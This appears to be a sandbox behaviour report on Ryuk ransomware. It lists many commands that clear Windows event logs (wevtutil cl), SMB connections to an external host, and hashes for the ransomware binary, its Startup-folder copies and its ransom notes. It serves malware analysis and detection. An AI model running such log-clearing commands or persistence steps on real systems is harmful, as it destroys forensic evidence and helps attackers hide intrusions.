C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AMSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AirSpaceChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "FirstUXPerf-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "General Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "IHM_DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceMFT"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationFrameServer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProcD3D"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationAsyncWrapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationContentProtection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDS"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMP4"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMediaEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformanceCore"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationSrcPrefetch"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.97.242.52.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
FI 65.108.73.119:445 tcp
N/A 10.127.0.1:139 tcp
FI 65.108.73.119:139 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 210.81.184.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
FR 51.11.192.49:443 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 117.18.232.240:80 tcp
US 117.18.232.240:80 tcp
US 117.18.232.240:80 tcp
US 117.18.232.240:80 tcp
NL 173.223.113.164:443 tcp
US 8.8.8.8:53 97.238.32.23.in-addr.arpa udp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp

Files

C:\ProgramData\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\ProgramData\hrmlog1

MD5 cf30a97d06523d5819b46c7db7b85129
SHA1 e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256 b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA512 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 cf30a97d06523d5819b46c7db7b85129
SHA1 e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256 b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA512 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 e14553b25f8951635bc37c90beffecc0
SHA1 60d9f6ff88506a9fcd36342fa2698025e990a673
SHA256 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA512 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

C:\ProgramData\hrmlog1

MD5 cf30a97d06523d5819b46c7db7b85129
SHA1 e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256 b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA512 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

C:\ProgramData\hrmlog2

MD5 e14553b25f8951635bc37c90beffecc0
SHA1 60d9f6ff88506a9fcd36342fa2698025e990a673
SHA256 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA512 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

C:\ProgramData\hrmlog2

MD5 e14553b25f8951635bc37c90beffecc0
SHA1 60d9f6ff88506a9fcd36342fa2698025e990a673
SHA256 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA512 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 85462c5c76a1f9effd9d24af445182da
SHA1 8b5f57029bd8ac3c5b182608de6691d6e1492b3f
SHA256 8ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4
SHA512 828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5

C:\ProgramData\RYUKID

MD5 85462c5c76a1f9effd9d24af445182da
SHA1 8b5f57029bd8ac3c5b182608de6691d6e1492b3f
SHA256 8ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4
SHA512 828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5

C:\ProgramData\hrmlog2

MD5 e14553b25f8951635bc37c90beffecc0
SHA1 60d9f6ff88506a9fcd36342fa2698025e990a673
SHA256 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA512 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

C:\ProgramData\hrmlog1

MD5 cf30a97d06523d5819b46c7db7b85129
SHA1 e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256 b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA512 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4